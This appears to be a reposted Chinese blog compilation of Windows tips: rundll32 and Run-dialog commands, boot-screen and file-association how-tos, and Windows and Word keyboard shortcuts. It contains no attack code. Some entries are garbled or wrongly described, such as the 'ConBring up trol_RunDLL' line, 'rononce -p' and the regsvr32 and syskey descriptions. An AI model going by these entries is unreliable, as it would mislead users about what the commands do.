显示“显示属性,萤屏保护”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2 功能: 显示“显示属性,外观”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3 功能: 显示显示“显示属性,属性”选项视窗。 命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder 功能: 显示Windows的“字体”档案夹。 命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3 功能: 同样是显示Windows的“字体”档案夹。 命令列: rundll32.exe shell32.dll,SHformatDrive 功能: 显示格式化软碟对话框。 命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,0 功能: 显示“控制面板控制器,一般”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,1 功能: 显示“控制面板,游戏控制器,进阶”选项视窗。 命令列: rundll32.exe mshtml.dll,PrintHTML (HTML文档) 功能: 列印HTML文档。 命令列: rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl 功能: 显示Microsoft Exchange一般选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @0 功能: 显示“控制面板,滑鼠” 选项 。 命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1 功能: 显示 “控制面板,键盘属性,速度”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1,,1 功能: 显示 “控制面板,键盘属性,语言”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @2 功能: 显示Windows“印表机”档案夹。 命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3 功能: 显示Windows“字体”档案夹。 命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @4 功能: 显示“控制面板,输入法属性,输入法”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL modem.cpl,,add 功能: 执行“添加新调制解调器”向导。 命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0 功能: 显示“控制面板,多媒体属性,音频”属性页。 命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1 功能: 显示“控制面板,多媒体属性,视频”属性页。 命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2 功能: 显示“控制面板,多媒体属性,MIDI”属性页。 命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3 功能: 显示“控制面板,多媒体属性,CD音乐属性页。 命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4 功能: 显示“控制面板,多媒体属性,设备”属性页。 命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1 功能: 显示“控制面板,声音”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl 功能: 显示“控制面板,网路”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl 功能: 显示ODBC32资料管理选项视窗。 命令列: rundll32.exe shell32.dll,OpenAs_RunDLL {drive:\path\filename} 功能: 显示指定档案(drive:\path\filename)的“打开方式”对话框。 命令列: rundll32.exe shell32.dll,Control_RunDLL password.cpl 功能: 显示“控制面板,密码”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl 功能: 显示“控制面板,电源管理属性”选项视窗。 命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder 功能: 显示Windows“印表机”档案夹。(同rundll32.exe shell32.dll,Control_RunDLL main.cpl @2) 命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0 功能: 显示“控制面板,区域设置属性,区域设置”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1 功能: 显示“控制面板,区域设置属性,数字”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2 功能: 显示“控制面板,区域设置属性,货币”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3 功能: 显示“控制面板,区域设置属性,时间”选项视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4 功能: 显示“控制面板,区域设置属性,日期”选项视窗。 命令列: rundll32.exe desk.cpl,InstallScreenSaver [萤屏保护档案名] 功能: 将指定的萤屏保护档案设置为Windows的屏保，并显示萤屏保护属性视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0 功能: 显示“控制面板,系统属性,传统”属性视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1 功能: 显示“控制面板,系统属性,设备管理器”属性视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2 功能: 显示“控制面板,系统属性,硬体配置档案”属性视窗。 命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3 功能: 显示“控制面板,系统属性,性能”属性视窗。 命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。 命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机。 命令列: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl 功能: 显示“拨号属性”选项视窗 命令列: rundll32.exe shell32.dll,Control_RunDLL themes.cpl 功能: 显示“桌面主旨”选项面板 Windows Vista Rundll32 常用命令列表 添加删除程序 RunDll32.exe shell32.dll，Control_RunDLL appwiz.cpl，，0 内容审查程序 RunDll32.exe msrating.dll，RatingSetupUI 控制面板 RunDll32.exe shell32.dll，Control_RunDLL 删除IE浏览器等上网产生的Internet 临时文件 RunDll32.exe InetCpl.cpl，ClearMyTracksByProcess 8 删除IE浏览器等上网产生的Cookies RunDll32.exe InetCpl.cpl，ClearMyTracksByProcess 2 删除IE浏览器等上网浏览历史 RunDll32.exe InetCpl.cpl，ClearMyTracksByProcess 1 删除IE浏览器等的填表记录 RunDll32.exe InetCpl.cpl，ClearMyTracksByProcess 16 删除IE浏览器等上网时保存的用户密码 RunDll32.exe InetCpl.cpl，ClearMyTracksByProcess 32 删除上面所有的上网产生的垃圾、记录、临时文件 RunDll32.exe InetCpl.cpl，ClearMyTracksByProcess 255 删除IE浏览器插件所产生的垃圾记录 RunDll32.exe InetCpl.cpl，ClearMyTracksByProcess 4351 调整日期和时间 RunDll32.exe shell32.dll，Control_RunDLL timedate.cpl 显示设置 RunDll32.exe shell32.dll，Control_RunDLL access.cpl，，3 设备管理器 RunDll32.exe devmgr.dll DeviceManager_Execute 文件夹选项 - 常规 RunDll32.exe shell32.dll，Options_RunDLL 0 文件夹选项 - 文件类型设置 RunDll32.exe shell32.dll，Control_Options 2 文件夹选项 - 搜索设置 RunDll32.exe shell32.dll，Options_RunDLL 2 文件夹选项 - 查看 RunDll32.exe shell32.dll，Options_RunDLL 7 忘记密码向导 RunDll32.exe keymgr.dll，PRShowSaveWizardExW 立即进入休眠状态 RunDll32.exe powrprof.dll，SetSuspendState Internet Explorer 的 Internet 选项 Rundll32 Shell32.dll，ConBring up trol_RunDLL Inetcpl.cpl，，6 键盘设置 RunDll32.exe shell32.dll，Control_RunDLL main.cpl @1 锁屏 RunDll32.exe user32.dll，LockWorkStation 鼠标切换左右键 Rundll32 User32.dll，SwapMouseButton 鼠标设置 Rundll32 Shell32.dll，Control_RunDLL main.cpl @0，0 映射网络驱动器 Rundll32 Shell32.dll，SHHelpShortcuts_RunDLL Connect 网络连接 RunDll32.exe shell32.dll，Control_RunDLL ncpa.cpl 管理IE收藏夹 Rundll32.exe shdocvw.dll，DoOrganizeFavDlg 直接打开某文件的对话框 Rundll32 Shell32.dll，OpenAs_RunDLL 任意文件名 打印机用户界面 Rundll32 Printui.dll，PrintUIEntry /? 打印机管理 Rundll32 Shell32.dll，SHHelpShortcuts_RunDLL PrintersFolder 电源设置 RunDll32.exe Shell32.dll，Control_RunDLL powercfg.cpl Process Idle Tasks rundll32.exe advapi32.dll，ProcessIdleTasks 地区和语言设置 Rundll32 Shell32.dll，Control_RunDLL Intl.cpl，，0 系统保存的密码管理 RunDll32.exe keymgr.dll，KRShowKeyMgr 安全移除硬件对话框 Rundll32 Shell32.dll，Control_RunDLL HotPlug.dll 系统声音设置 Rundll32 Shell32.dll，Control_RunDLL Mmsys.cpl，，0 系统属性对话框 Rundll32 Shell32.dll，Control_RunDLL Sysdm.cpl，，3 系统属性 - 高级 RunDll32.exe shell32.dll，Control_RunDLL sysdm.cpl，，4 系统属性:自动更新 RunDll32.exe shell32.dll，Control_RunDLL sysdm.cpl，，5 任务栏属性 RunDll32.exe shell32.dll，Options_RunDLL 1 用户帐户管理 RunDll32.exe shell32.dll，Control_RunDLL nusrmgr.cpl 插入/弹出硬件 RunDll32.exe shell32.dll，Control_RunDLL hotplug.dll Windows 安全中心 RunDll32.exe shell32.dll，Control_RunDLL wscui.cpl Windows - 关于 RunDll32.exe SHELL32.DLL，ShellAboutW Windows 字体安装文件夹 Rundll32 Shell32.dll，SHHelpShortcuts_RunDLL FontsFolder Windows防火墙 RunDll32.exe shell32.dll，Control_RunDLL firewall.cpl 无线网络设置 RunDll32.exe shell32.dll，Control_RunDLL NetSetup.cpl，@0，WNSW 当然，不止是VisualBasic，象Delphi.VisualC，，等其他程式设计语言也可以通过呼叫外部命令的方法来使用Rundll的这些功能，具方法这里就不再详细叙述了。灵活的使用Rundll,一定会使你的程式设计轻轻松松，达到事半功倍的效果～ 去除Windows XP/2000/98系统启动画面 2009-02-08 13:01:35 被20人转藏 | 小贴士:测试:你在别人眼中的真相，很真实～ 相信每位Windows用户对它的启动画面都不陌生——在Windows 98下是一片“蓝天白云”，在Windows XP中则酷了不少，不过还是一扇“破窗户”。虽然画面并不算太难看，不过如果你和我一样不想再看见它们，完全可以让它们在电脑启动的时候消失～ Windows 2000/XP篇 用鼠标右击桌面上的“我的电脑”，选择“属性”“系统属性”“高级”选项页，在窗口下面的“启动和故障恢复”区域中，点击“设置”按钮。在弹出的“启动和故障恢复”对话窗口中，点击“编辑”按钮，这样就用记事本打开了Boot.ini文件。 在Windows 2000/XP操作系统所在那一行语句，比如: multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Professional" /fastdetect 后面加一个空格，再加上参数:/noguiboot，保存后，关闭Boot.ini文件，重新启动计算机看看，启动画面已经不见了。 对于Windows XP，我们也可以利用系统配置应用程序来修改文件。打开“开始”“运行”，在运行对话框中输入:Msconfig，点击“确定”后即打开了系统配置实用程序，点击切换到“BOOT.INI”选项页，在“启动选项”功能区域中选中“/NOGUIBOOT”复选项即可。 Windows 98篇 要去除Windows 98的启动画面，就要修改隐藏的系统文件msdos.sys。打开“资源管理器” “查 看” “文件夹选项”，切换到“查看”选项页，选中“显示所有文件和文件夹”项，点击“确定”返回后就可以看到C盘根目录下的msdos.sys文件，用记事本打开此文件，在[Option]节下添加一行“Logo=0”，保存后退出即可。 WinXP系统文件关联解析 2009-02-08 13:00:49 被16人转藏 | 小贴士:教你把口袋放到自己的桌面上吧! 本文介绍如何在Windows XP中更改文件关联。文件关联可以指定总是使用同一个程序打开具有特定文件扩展名的文件,也可以修改现有文件类型，以更改它与程序的关联。你可以在Windows资源管理器或“我的电脑”中处理文件关联。 如何更改文件关联 你可能希望将某一文件扩展名的关联从一个程序更改为另一个程序。例如，你可能想用您最喜欢的字处理器打开文本文件 (.txt)，以便设置文本的格式。默认情况下，文本文件与 Microsoft 记事本关联。默认情况下，已知文件类型的文件扩展名是隐藏的。 查看所有文件扩展名 1. 在“我的电脑”或 Windows 资源管理器中的工具菜单上，单击文件夹选项。 2. 单击查看选项卡。 3. 清除“隐藏已知文件类型的扩展名”复选框。 更改文件关联 1. 右键单击要更改其扩展名关联的文件，然后单击打开方式。 2. 在打开方式对话框中，单击您想在其中打开文件的程序，或者单击浏览以找到所需的程序。 3. 选中“始终使用选择的程序打开这种文件”复选框。 如何为无关联文件类型创建文件关联 你可能需要为尚未与计算机中的程序建立关联的文件类型创建文件关联。进行此操作通常有两个原因: 1)有的程序(例如数据库)所生成的文件报告的扩展名在Windows XP中未注册。 2)你收到电子邮件附件，而您的计算机中未安装创建该附件的程序，但您可以使用其他已安装的程序阅读这些文件。 要创建文件关联，请按照下列步骤操作: 1. 右键单击要更改其扩展名的文件，然后单击打开，或者双击该文件。 2. Windows XP 将显示一个对话框，指出没有与此文件关联的程序。该对话框提供两种用于创建关联的选项: 使用 Web 服务寻找适当的程序 从列表中选择程序 除非你需要找到并下载能够打开此文件类型的软件，否则最好从列表中选择程序。 3. Windows 显示的对话框中列出了计算机中已安装的程序。如果未列出此文件类型要使用的程序，请单击浏览以找到适当的软件。选中“始终使用选择的程序打开这种文件”复选框。 键盘上每个键作用!!! (史上最全的~~精) 2009-02-08 13:00:11 被75人转藏 | 小贴士:来挑战一下星爷的经典台词吧? Windows快捷键 Windows自推出以来一直以其快捷的操作，简单的界面，实用的功能，强大的多媒体功能等诸多特性为买点长期占据着操作系统的王座。并且我们使用Windows也已经有数个春秋了，但我们真的对Windows操作了如执掌了吗?真的知道如何操作吗?现在笔者就告诉各位看官一些Windows经典的快捷键，使您的操作水品瞬间让人刮目相看。 CTRL+A:选中活动窗口的所有内容 CTRL+C:把选中的东西复制到粘贴板 CTRL+F:显示“查找和替换”对话框 CTRL+G:显示定位对话框 CTRL+N:显示新建对话框 CTRL+O:显示打开对话框 CTRL+P:显示打印对话框 CTRL+S:保存当前文档 CTRL+V:粘贴 CTRL+X:剪切 CTRL+Z:撤销 CTRL+F4:关闭当前活动窗口 CTRL+拖放文件:复制拖放的文件 CTRL+ESC:显示开始菜单 CTRL+F6:打开活动应用程序的下一个文档窗口 ALT+ENTER:显示选中对象的属性 ALT+F4:关闭活动项目或者退出活动的程序 ALT+空格:打开当前活动窗口的快捷菜单 ALT+TAB:在打开窗口间切换 ALT+ESC:以打开的顺序切换窗口 F1:提供当前窗口或者选中项目的帮助文件 F2:重命名选中的项目 F3:搜索文件或文件夹 F4:显示我的电脑或Windows Explorer中的地址栏 F5:刷新活动窗口 F6:在当前窗口中的元素间切换，与TAB键功能一样 F10:激活当前窗口的菜单栏 Win:显示或隐藏开始菜单 Win+BREAK:显示系统属性对话框 Win+D:显示桌面 Win+M:最小化所有窗口 Win+SHIFT+M:恢复最小化窗口 Win+E:打开我的电脑 Win+F:搜索文件或文件夹 CTRL+Win+F:搜索计算机 Win+F1:显示Windows帮助文件 Win+L:锁住键盘 Win+R:打开运行窗口 Win+U:打开辅助工具管理器 TAB:在选项间切换 SHIFT+TAB:在选项间切换，顺序与TAB相反 CTRL+TAB:在标签间进行切换 CTRL+SHIFT+TAB:在标签间反向切换 ALT+带下划线的字母:运行相应的命令或选择相应的选项 空格键:如果焦点选中复选框，选择或反选复选框 以下的快捷键用于与Windows资源管理器类型的程序: NUM LOCK+星号(*):显示选中文件夹的所有子文件夹 NUM LOCK+加号(+):显示选中文件夹的内容 NUM LOCK+减号(—):折叠选中文件夹 在日常电脑操作中，完全靠鼠标走天下的人，菜鸟也。笔者举例几个常用的快捷键组合:CTRL + ALT + DELETE = 打开任务管理器，CTRL + C = 复制当前所选定内容，CTRL + SPACE = 进行中英文切换，我们不可能不使用这些方便快捷键组合键，除非你不知道。然而方便的快捷键远远不止这些，笔者收罗了部分常用的快捷键以供参考。 WINDOWS快捷键 [ 注意 ] BACKSPACE键为退格键，SPACE键为空格键，WINDOWS徽标键自己找，DELETE键和DEL键功能一样，?键为向上的方向键，?键为向下的方向键; 为了让相近或者同一类的快捷键排在一起，我们让部分快捷键重复出现。 WINDOWS类快捷键均在WINDOWS XP SP2系统下验证通过，WORD类快捷键在OFFICE XP SP3里验证通过。大部分快捷键要在指定条件下才能起作用。 系统类快捷键 【F1】 显示当前程序或者Windows的帮助内容 【F2】 当你选中一个文件的话，这意味着“重命名” 【F3】 当你在桌面上的时候是打开“查找:所有文件”对话框 【F5】 刷新当前窗口 【F10】或【ALT】 激活当前程序的菜单栏 【ALT + F4】 关闭当前应用程序 【CTRL + W】 关闭当前窗口 【CTRL + F6】 切换到当前应用程序窗口的下一个栏目(向前) 【CTRL + SHIFT + F6】 切换到当前应用程序窗口的下一个栏目(向后) 【CTRL + ESC】或者【WINDOWS徽标键】 显示开始菜单 【CTRL + ALT + DELETE】 打开任务管理器，在WIN9X中连续点击两次可重启电脑 【ALT + SPACE】 打开程序最左上角的菜单，窗口控制菜单 【ALT + TAB】 切换当前运行程序，顺序向前 【SHIFT + TAB】 切换当前运行程序，顺序向后 【ALT + ESC】 切换当前程序 【ALT + ENTER】 将Windows下运行的MSDOS窗口在窗口和全屏幕状态间切换，对某些应用程序也起作用 【CTRL + SPACE】 进行中英文切换 【SHIFT + SPACE】 进行全角/半角切换 【CTRL + SHIFT】 进行多输入法切换 操作类快捷键 【DELETE】 删除被选择的选择项目，如果是文件，将被放入回收站 【SHIFT + DELETE】 删除被选择的选择项目，如果是文件，将被直接删除而不是放入回收站 【PRINT SCREEN】 将当前屏幕以图象方式拷贝到剪贴板 【ALT + PRINT SCREEN】 将当前活动程序窗口以图象方式拷贝到剪贴板 【CTRL + C | CTRL + INSERT】 复制被选择的项目到剪贴板 【CTRL + V | SHIFT + INSERT】 粘贴剪贴板中的内容到当前位置 【CTRL + Z | ALT + BACKSPACE】 撤销上一步的操作 【CTRL + A】 全选当前文档的内容，包括网页等 【CTRL + N】 新建一个新的文件 【CTRL + O】 打开“打开文件”对话框 【CTRL + P】 打开“打印”对话框 【CTRL + S】 保存当前操作的文件 【CTRL + X】 剪切被选择的项目到剪贴板 【CTRL + W】 关闭当前窗口 按住【Shift】键并双击桌面上的“我的电脑”图标，即可打开“资源管理器”窗口 在文本域里，使用【SHIFT】+ 【?】选取光标之前的文字，使用【SHIFT】+ 【?】选取光标之后的文字 【SHIFT + F10】或鼠标右击 打开当前活动项目的快捷菜单 【SHIFT】 在放入CD的时候按下不放，可以跳过自动播放CD;在打开word的时候按下不放，可以跳过自启动的宏 WINDOWS徽标键所组合出的快捷键 【WINDOWS徽标键】或者【CTRL + ESC】 显示“开始”菜单 【WINDOWS徽标键+ F1】 打开Windows帮助中心 【WINDOWS徽标键+ E】 打开资源管理器 【WINDOWS徽标键+ F】 打开“查找:所有文件”对话框 【WINDOWS徽标键+ CTRL + F】 打开“查找:计算机” 【WINDOWS徽标键+ D】 最小化或还原所有窗口 【WINDOWS徽标键+ R】 打开“运行”对话框 【WINDOWS徽标键+ M】 最小化所有被打开的窗口 【WINDOWS徽标键+ SHIFT + M】 撤消最小化所有窗口 【WINDOWS徽标键+ BREAK】 显示“系统属性”对话框 【WINDOWS徽标键+ TAB】 在任务栏上的按钮间循环 辅助选项快捷键 注:具体设置可在[控制面板]-[辅助功能选项]里修改，也可以去掉这些快捷键，如玩FIFA足球就必须关 闭和SHIFT键有关的辅助选项快捷键 按下右【SHIFT】键八秒 切换筛选键开关 【左ALT+左SHIFT+PRINT SCREEN】 切换高对比度开关 【左ALT+左SHIFT+NUM LOCK】 切换鼠标键开关 点击【SHIFT】键五次 切换粘滞键开关 按下【NUM LOCK】键五秒 切换切换键开关 WORD快捷键 【F1】键:帮助 【F2】键:移动文字或图形，按回车键确认 【F4】键:重复上一次的操作 【F5】键:编辑时的定位 【F6】键:在文档和任务窗格或其他WORD窗格之间切换 【F8】键:打开WORD的选择模式 【F12】键:打开“另存为”对话框 【SHIFT + F2】组合键:复制文本 【SHIFT + F3】组合键:改变字母大小写 【SHIFT + F4】组合键:重复查找或定位 【SHIFT + F12】组合键:选择“文件”菜单中的“保存”菜单项 【SHIFT + F5】组合键:跳转文档中上一次编辑位置 【SHIFT + ?】 组合键:选中光标左侧一个字符 【SHIFT + ?】 组合键:选中光标右侧一个字符 【SHIFT + PAGEUP】 组合键:选中光标当前位置至上一屏之间的内容 【SHIFT + PAGEDOWN】 组合键:选中光标当前位置至下一屏之间的内容 【CTRL + HOME】 组合键:将光标移到文档开始处 【CTRL + END】组合键:将光标移到文档结尾处 【CTRL + PAGEUP】 组合键:将插入点移至上一页窗口顶部 【CTRL + PAGEDOWN】组合键:将插入点移至下一页窗口顶部 【SHIFT + ?】或者【SHIFT + HOME】组合键:从光标处开始，向行首进行选取 【SHIFT + ?】或者【SHIFT + END】 组合键:从光标处开始，向行尾进行选取 【CTRL + F2】 组合键:打印预览 【CTRL + F4】 组合键:关闭窗口 【CTRL + F6】 组合键:在打开的文档之间切换 【CTRL + F12】 组合键:打开“打开”对话框 【CTRL + 1】 组合键:单倍行距 【CTRL + 2】 组合键:双倍行距 【CTRL + 5】 组合键:1.5倍行距 【CTRL + A】 组合键:全选 【CTRL + B】 组合键:字符变为粗体 【CTRL + C】 组合键:复制 【CTRL + SHIFT + D】 组合键:分散对齐 【CTRL + E】 组合键:段落居中 【CTRL + F】 组合键:查找 【CTRL + G】 组合键:定位 【CTRL + H】 组合键:替换 【CTRL + I】 组合键:字符变为斜体 【CTRL + J】 组合键:两端对齐 【CTRL + K】 组合键:超级连接 【CTRL + L】 组合键:左对齐 【CTRL + N】 组合键:新建文档 【CTRL + M】 组合键:左侧段落缩进 【CTRL + O】 组合键:打开文档 【CTRL + P】 组合键:打印 【CTRL + Q】 组合键:取消段落格式 【CTRL + R】 组合键:右对齐 【CTRL + S】 组合键:保存 【CTRL + T】 组合键:创建悬挂缩进 【CTRL + U】 组合键:为字符添加下划线 【CTRL + V】 组合键:粘贴 【CTRL + W】 组合键:关闭当前文档 【CTRL + X】 组合键:剪贴 【CTRL + Y】 组合键:重复步骤 【CTRL + Z】 组合键:撤消步骤 【CTRL + SHIFT + Z】组合键:格式清除 【CTRL + SHIFT】 组合键:输入法转换 【ALT + F8】 组合键:打开“宏”的对话框 【CTRL + 空格】 组合键:中、西文转换 【CTRL + ENTER】 组合键:插入分页符 【CTRL + SHIFT + M】 组合键:取消左侧段落缩进 【CTRL + SHIFT + F12】 组合键:选择“文件”菜单中的“打印”菜单项 【CTRL + SHIFT + F】 组合键:改变字体 【CTRL + SHIFT + P】 组合键:改变字号 【CTRL + SHIFT + >】 组合键:增大字号 【CTRL + SHIFT + ?终极收藏?: 【幸福收藏】 生活百宝箱(抢宝哦) 【音乐收藏】《音乐知识总篇》(附音乐) 【特别收藏】366天生日密码(解密你的人生) 【实用收藏】玩转电脑技巧全书一[申请精华] 【精神收藏】忠言玉语值得一辈子领悟 【精典收藏】玩转电脑技巧全书二(申精精华) 【养眼收藏】极品唯美清纯美女(别流鼻血哦) 【百科收藏】 中国传统文化常识(超全) 【一生收藏】女人必看(男人必读) 【投资收藏】【终极密籍】抄股，理财天下～ Windows XP运行命令 2009-02-08 12:59:30 被44人转藏 | 小贴士:测试:你在别人眼中的真相，很真实～ Windows XP运行命令 在Windows系统中，我们打开一些程序都是通过鼠标一步一步的点击来打开，但是以下列出的这些命令， 可以让你在Windows XP的“运行”窗口中运行应用程序。 运行程序/运行命令 : 辅助功能选项 access.cpl 添加硬件向导 hdwwiz.cpl 添加或删除程序 appwiz.cpl 管理工具 control admintools 自动更新 wuaucpl.cpl Bluetooth文件传送向导 fsquirt 计算器 calc 证书管理控制台 certmgr.msc 字符映射表 charmap 磁盘检查工具 chkdsk 剪贴簿查看器 clipbrd 命令行提示符 cmd 组件服务 dcomcnfg 计算机管理 compmgmt.msc 日期和时间属性 timedate.cpl DDE共享 ddeshare 设备管理器 devmgmt.msc Direct X控制面板(如果已经安装)* directx.cpl Direct X诊断工具 dxdiag 磁盘清理工具 cleanmgr 磁盘碎片整理程序 dfrg.msc 磁盘管理 diskmgmt.msc 磁盘分区管理器 diskpart 显示属性 control desktop 显示属性 desk.cpl 显示属性的外观选项卡 control color Dr. Watson系统诊断工具 drwtsn32 Driver Verifier Manager verifier 事件查看器 eventvwr.msc 文件签名验证 sigverif 快速查找 findfast.cpl 文件夹选项 control folders 字体文件夹 control fonts 字体文件夹 fonts 空档接龙游戏 freecell 游戏控制 joy.cpl 组策略编辑器(XP专业版) gpedit.msc 红心大战游戏 mshearts Iexpress向导 iexpress 索引服务 ciadv.msc Internet属性 inetcpl.cpl IP配置实用程序(显示连接配置) ipconfig /all IP配置实用程序(显示DNS缓存内容) ipconfig /displaydns IP配置实用程序(删除DNS缓存内容) ipconfig /flushdns IP配置实用程序(释放全部(或指定)适配器的由DHCP分配的动态IP地址) ipconfig /release IP配置实用程序(为全部适配器重新分配IP地址) ipconfig /renew IP配置实用程序(刷新DHCP并重新注册DNS) ipconfig /registerdns IP配置实用程序(显示DHCP Class ID) ipconfig /showclassid IP配置实用程序(修改DHCP Class ID) ipconfig /setclassid Java控制面板(如果已经安装) jpicpl32.cpl Java控制面板(如果已经安装) javaws 键盘属性 control keyboard 本地安全设置 secpol.msc 本地用户和组 lusrmgr.msc 从Windows注销 logoff 微软聊天程序 winchat 扫雷游戏 winmine 鼠标属性 control mouse 鼠标属性 main.cpl 网络连接 control netconnections 网络连接 ncpa.cpl 网络安装向导 netsetup.cpl 记事本 notepad Nview桌面管理器(如果已经安装) nvtuicpl.cpl 对象包装程序 packager ODBC数据源管理器 odbccp32.cpl 屏幕键盘 osk AC3解码器(如果已经安装) ac3filter.cpl 密码属性 password.cpl 性能 perfmon.msc 性能 perfmon 电话与调制解调器选项 telephon.cpl 电源选项属性 powercfg.cpl 打印机和传真 control printers 打印机文件夹 printers TrueType造字程序 eudcedit Quicktime(如果已经安装) QuickTime.cpl 区域和语言选项 intl.cpl 注册表编辑器 regedit 注册表编辑器 regedit32 远程桌面 mstsc 可移动存储 ntmsmgr.msc 可移动存储操作请求 ntmsoprq.msc 策略的结果集 (XP专业版) rsop.msc 扫描仪与相机 sticpl.cpl 任务计划 control schedtasks Windows安全中心 wscui.cpl 服务 services.msc 共享文件夹 fsmgmt.msc 关闭Windows shutdown 声音和音频设备属性 mmsys.cpl 蜘蛛牌游戏 spider SQL Client客户端网络实用工具 cliconfg 系统配置编辑器 sysedit 系统配置实用程序 msconfig 系统文件检查工具(立即扫描) sfc /scannow 系统文件检查工具(下次启动时扫描) sfc /scanonce 系统文件检查工具(每次启动时扫描) sfc /scanboot 系统文件检查工具(返回默认设置) sfc /revert 系统文件检查工具(清除文件缓存) sfc /purgecache 系统文件检查工具(设置缓存大小=x) sfc /cachesize=x 系统属性 sysdm.cpl 任务管理器 taskmgr Telnet客户端 telnet 用户帐户管理 nusrmgr.cpl 辅助工具管理器 utilman Windows防火墙 firewall.cpl Windows放大镜 magnify Windows管理体系结构 wmimgmt.msc Windows系统安全工具 syskey 运行Windows更新 wupdmgr 漫游Windows XP tourstart 写字板 write gpedit.msc-------------------------组策略 sndrec32-------------------------录音机 nslookup-------------------------ip地址侦测器 explorer-------------------------打开资源管理器 logoff--------------------------注销命令 tsshutdn-------------------------60秒倒计时关机命令 lusrmgr.msc-------------------------本机用户和组 services.msc-------------------------本地服务设置 oobe/msoobe /a----------------------检查xp是否激活 notepad--------------------------打开记事本 cleanmgr-------------------------垃圾整理 net start messenger-----------------开始信使服务 compmgmt.msc-------------------------计算机管理 net stop messenger-----------------停止信使服务 conf-------------------------启动 dvdplay-------------------------dvd播放器 charmap-------------------------启动字符映射表 diskmgmt.msc-------------------------磁盘管理实用程序 calc-------------------------启动计算器 dfrg.msc-------------------------磁盘碎片整理程序 chkdsk.exe-------------------------chkdsk磁盘检查 devmgmt.msc--- ----------------------设备管理器 regsvr32 /u *.dll-------------------停止dll文件运行 drwtsn32------ -------------------系统医生 rononce -p ------------------------15秒关机 dxdiag-------------------------检查directx信息 regedt32-------------------------注册表编辑器 msconfig.exe-------------------------系统配置实用程序 rsop.msc-------------------------组策略结果集 mem.exe-------------------------显示内存使用情况 regedit.exe-------------------------注册表 winchat-------------------------xp自带局域网聊天 progman-------------------------程序管理器 winmsd-------------------------系统信息 perfmon.msc-------------------------计算机性能监测程序 winver-------------------------检查windows版本 sfc /scannow-----------------------扫描错误并复原 winver-------------------------检查windows版本 wmimgmt.msc-------------------------打开windows管理体系结构 wupdmgr-------------------------windows更新程序 w脚本---------------------------windows脚本宿主设置 write-------------------------写字板 winmsd-------------------------系统信息 wiaacmgr-------------------------扫描仪和照相机向导 winchat-------------------------xp自带局域网聊天 mem.exe-------------------------显示内存使用情况 msconfig.exe-------------------------系统配置实用程序 mplayer2-------------------------简易 mspaint-------------------------画图板 mstsc-------------------------远程桌面连接 mplayer2-------------------------媒体播放机 magnify-------------------------放大镜实用程序 mmc-------------------------打开控制台 mobsync-------------------------同步命令 dxdiag-------------------------检查directx信息 drwtsn32------------------------- 系统医生 devmgmt.msc--- ----------------------设备管理器 dfrg.msc-------------------------磁盘碎片整理程序 diskmgmt.msc-------------------------磁盘管理实用程序 dcomcnfg-------------------------打开系统组件服务 ddeshare-------------------------打开dde共享设置 dvdplay-------------------------dvd播放器 net stop messenger-----------------停止信使服务 net start messenger-----------------开始信使服务 notepad-------------------------打开记事本 nslookup-------------------------网络管理的工具向导 ntbackup-------------------------系统备份和还原 narrator-------------------------屏幕"讲述人" nyessmgr.msc-------------------------移动存储管理器 nyessoprq.msc-------------------------移动存储管理员操作请求 netstat -an------------------------(tc)命令检查接口 syncapp-------------------------创建一个公文包 sysedit-------------------------系统配置编辑器 sigverif-------------------------文件签名验证程序 sndrec32-------------------------录音机 shrpubw-------------------------创建共享文件夹 secpol.msc-----====================本地安全策略 syskey---------================系统加密，一旦加密就不能解开，保护windows xp系统的双重密 码 services.msc---======================本地服务设置 sndvol32-------==================音量控制程序 sfc.exe--------=================系统文件检查器 sfc /scannow---======================windows文件保护 tsshutdn-------==================60秒倒计时关机命令 tourstart------===================xp简介(安装完成后出现的漫游xp程序) taskmgr--------=================任务管理器 eventvwr-------==================事件查看器 eudcedit-------==================造字程序 explorer-------==================打开资源管理器 packager-------==================对象包装程序 perfmon.msc----=====================计算机性能监测程序 progman--------=================程序管理器 regedit.exe----=====================注册表 rsop.msc-------==================组策略结果集 regedt32-------==================注册表编辑器 rononce -p ----====================15秒关机 